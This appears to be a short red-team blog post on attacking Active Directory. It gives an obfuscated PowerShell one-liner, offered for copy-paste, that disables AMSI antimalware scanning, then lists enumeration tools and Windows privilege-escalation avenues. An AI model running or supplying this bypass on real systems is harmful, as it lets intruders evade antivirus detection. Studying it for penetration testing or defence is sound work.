Hey Hackers! This time let’s Talk about Active Directory . I will try to make it simple as much as possible but let
me know if you need a details post about any technique. So, Let’s start with..
PowerShell AMSI Bypass
When you are in a Red Team Assessment and you had some initial foothold in one of the environments, now
you need to start digging up but if you run PowerShell enum/exploitation tools machine’s AMSI or AV’s warnings
will be triggered. Here are few commands to bypass them.
Obfuscation example for copy-paste purposes:
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" )
-VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),(
"{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Another bypass, which is not detected by PowerShell autologging:
Check the github page S3cur3Th1sSh1t/Amsi-Bypass-Powershell for detailed information.
These Powershell commands will help you bypass the AMSI and AV now you can run your enumeration tools.
Here, I could tell you all about the tools and how you could use them but that doesn’t add much value so here I
will try to explain the concept of the attack and the tools to use. Via Enumeration tools like
Use PowerView, ADModule-master, and explore there commands.
Basically the idea behind this to hunt for Local Admin access on other machines or for high privilege domain
accounts, ( like a Domain Administrator).
So we have various ways of locally escalating privilege on Windows box.
-
Missing patches
Automated deployment and Autologon passwords in clear text,
AlwaysInstallElevated (Any user can run MSI as SYSTEM).
Misconfiguration Services
Dll hijacking.
Now, when you have local admin access then run the below tools for complete coverage.
PowerUp
BeRoot
Privecs
Will cover PrivEsc in the next post to be continued.